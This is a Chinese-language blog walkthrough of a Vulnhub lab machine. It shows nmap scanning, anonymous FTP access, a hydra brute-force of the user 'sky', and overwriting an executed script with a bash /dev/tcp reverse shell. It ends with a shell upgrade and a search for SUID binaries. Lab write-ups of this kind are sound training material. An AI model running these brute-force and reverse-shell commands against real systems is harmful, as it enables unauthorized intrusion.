由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!
本文靶机下载连接-戳我直接下载!
使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP
如下所示
可以看到,开放的几个端口分别是21/ftp 22/ssh 80/http 3306/mysql
21/ftp
从扫描结果可以看到可以使用ftp的匿名用户anonymous
登录,并且有一个welcome.msg
的文件
22/ssh
ssh可以直接pass掉了,这个版本基本上没有什么可利用的漏洞了,一般获取到了用户信息或者爆破才使用这个
80/http
基本上大部分的漏洞都是存在于web服务上
3306/mysql
是Mysql服务,后续如果获取到了一些用户信息可以用来爆破或者写马之类的
我们先看看21/ftp
上的文件
我们通过如下方式下载welcome.msg
文件
发现了一个有意思的东西,这个文件内的内容其实就是在登录ftp
时显示的消息,如下所示
发现了一个关键的信息,那就是有一个邮箱sky@funbox9
其中sky
可能是一个用户名
我使用如下命令对ftp服务的sky
用户进行爆破
hydra -l sky -P /usr/share/wordlists/rockyou.txt -t 32 192.168.2.7 ftp
我们使用获得的账户密码登录该靶机的ftp
服务
如下所示,登录成功之后该用户的目录下有一个user.flag
的文件,我们使用get
命令将其下载
我们看看下载好的user.flag
文件
如下所示,这段内容是sh
脚本文件,貌似会被执行,那么这里就有操作的空间了
我们编辑下载下来的user.flag
文件,改为如下内容(反弹shell)
#!/bin/sh
/bin/bash -i >& /dev/tcp/192.168.2.4/1234 0>&1
我们再次登录ftp
服务,将编辑完之后的user.flag
文件上传
如下所示,我们的nc
即可监听到反弹过来的shell
使用whoami
命令发现当前是sarah
用户
我们再使用python3 -c 'import pty;pty.spawn("/bin/bash")'
命令升级一下shell
我们使用如下命令找找具有suid权限的命令
find / -perm -u=s -exec ls -al {} \; 2>/dev/null